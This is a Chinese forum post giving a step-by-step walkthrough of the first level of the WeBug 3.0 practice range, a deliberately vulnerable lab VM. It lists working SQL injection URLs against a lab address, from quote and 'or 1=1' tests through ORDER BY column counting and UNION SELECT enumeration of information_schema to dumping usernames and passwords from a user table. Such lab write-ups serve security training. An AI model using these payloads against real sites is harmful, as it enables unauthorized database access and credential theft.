安全资源-盼盼资源网-亲测资源网-盼盼的家园www.panpan.org

 找回密码
 立即注册
查看: 180|回复: 0

[普通] webug3.0第一关靶场答案(另解)-普通的GET注入-很简单的一...

[复制链接]

1976

主题

2056

帖子

40万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
406988
发表于 2019-10-5 16:44:42 | 显示全部楼层 |阅读模式
webug3.0第一关靶场答案(另解)-普通的GET注入

WeBug3.0虚拟机下载路径:
链接:https://pan.baidu.com/s/19234CirAiVf3H820uWWNeg
提取码:7jfs

第一关:普通的GET注入-很简单的一个注入



使用firefox 可以使用一个叫hackbar的插件,方便注入语句的测试

1、提交 ' 报错,可能存在注入点

测试语句:
http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1'



还是一个字符型的注入漏洞


2、提交 1' or 1='1 会显示出所有信息
测试语句:
http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' or 1='1



3、使用order by 语句可以猜解这个数据表有多少个字段
该例子使用的测试语句:
http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' or 1=1 order by 5-- -
目测就是4个了,当然有可能不是select * from tables_name:
order by 1
order by 2
order by 3 ······· 这个例子在order by 1--4 都是能够正确回显,直到order by 5 会出现报错,如图:



即这个表含有4个字段


4、 使用联合查询 union select 出现显示位
测试语句:
http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,4-- -



此时也可以顺带把数据库的版本号,用户,和当前的数据库名字给查出
测试语句
http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,database(),version(),user()-- -



5、查表和列名
测试语句:
http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()-- -



表名都显示出来了,有comment,flag,good,user 4个表

测试语句:
http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name ='user'-- -
显示出了user表的列名:uid,uname,pwd,bill


6、拖库
测试语句:
http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,group_concat(uname),group_concat(pwd) from user-- -
将user表的帐号密码给爆出来了




小结:
当然我们还可以使用sqlmap的自动化工具来实验sql注入的测试,上述步骤主要是人工进行测试。



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|民间故事|新华字典|周公解梦|实用工具|加密解密|便民服务|盼盼工具箱|闹钟|默笙工具箱|易经风水|Archiver|手机版|小黑屋|安全资源-盼盼资源网